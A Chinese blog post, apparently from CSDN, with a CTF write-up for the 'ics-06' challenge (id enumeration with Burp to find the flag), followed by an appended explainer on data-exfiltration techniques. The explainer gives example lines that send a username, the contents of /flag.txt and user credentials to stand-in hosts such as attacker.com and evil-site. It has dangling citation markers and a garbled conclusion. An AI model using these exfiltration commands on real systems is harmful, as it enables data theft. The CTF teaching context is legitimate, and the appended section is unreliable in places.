CTF通关录

CTF通关录-ics-06


打开题目,先看看题目给的提示
在这里插入图片描述
有意思,我第一眼想法,难道日志审计?
打开题目,一个后台管理界面

通通点一遍
只有报表中心这个有反应
弹出了个这个
在这里插入图片描述
送分题?我信你个鬼哟,flag在哪?你倒是送给我鸭!
后面我尝试了日期范围,如果有日期回显就可能存在命令注入,但并没有
没有任何反应

看了一下源码,得儿,确认按钮是一个空的!!!
然后我看到了url中?id=1 SQL注入? 但我满心欢喜的尝试各种注入手法时,没得儿用!!!!并没有出现什么sql报错信息

线索断掉了!

最好我想了想,id=1也可以是,难道是逻辑漏洞中的id遍历?
bp跑一下
我这里尝试了1-10000的数字
在这里插入图片描述
还真有!
查看回复包内容
在这里插入图片描述
flag到手!

flag在手,胜利在手

### CTF竞赛中的数据外带技术 #### 数据外带的概念 在CTF竞赛中,数据外带是指攻击者通过某种方式将目标服务器上的敏感信息传递到外部可控环境的过程。这种技术通常用于无回显漏洞场景下获取执行结果或验证命令是否成功运行。 --- #### 常见的数据外带技术和方法 1. **DNSLog工具** DNSLog是一种基于域名解析的日志记工具,常用于捕获远程主机发起的DNS查询请求。它适用于无回显场景下的命令执行验证。当攻击者构造特定的payload时,可以通过触发DNS查询来实现数据外带[^4]。 2. **重定向与文件写入** 利用`>`、`>>`以及`tee`等Linux命令,可以将命令执行的结果保存至指定路径或将流量重定向到外部地址。例如,在某些RCE(Remote Code Execution)题目中,可通过以下方式完成数据外带: ```bash ping `whoami`.attacker.com ``` 上述命令会将当前用户名作为子域发送给`attacker.com`,从而达到泄露目的[^2]。 3. **CURL命令** 使用`curl`可以直接向外部接口发送GET/POST请求并携带参数。这种方法适合于需要传输较大规模数据的情况。例如: ```bash curl http://yourserver.com/data?result=$(cat /flag.txt) ``` 这里读取了`/flag.txt`的内容并通过HTTP GET请求将其上传到了自己的服务器上[^1]。 4. **SQL注入中的UNION SELECT联合查询** 对于存在SQL注入漏洞的应用程序来说,“堆叠查询”或者“联合查询”的技巧也可以用来实施数据外带操作。比如下面这个例子展示了如何把数据库表内的字段值拼接到URL后面形成新的链接指向攻击者的站点: ```sql UNION ALL SELECT null,null,'http://evil-site/'||username||'-'||password FROM users-- ``` 5. **其他协议利用** 除了上述提到的方式之外,还可以考虑FTP、SMTP等多种通信手段来进行信息转移;只要能够控制输入源就有可能找到合适的载体完成整个过程。 --- ### 实际案例分析 以NSSCTF为例说明具体应用情形:参赛选手需解决一道涉及命令注入的问题,其中给出了提示允许使用重定向机制解决问题。此时可以根据实际情况选用恰当的方法组合达成最终目标——即成功提取所需资料的同时规避检测风险[^3]。 --- ### 总结 综上所述,在参加CTF比赛期间遇到有关数据泄密类挑战项目时,应充分掌握各类基础技能包括但不限于编程语言特性理解程度高低不平等等因素影响效果表现差异明显所以要灵活运用各种资源寻找突破口进而顺利通关赢得胜利!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0XAXSDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值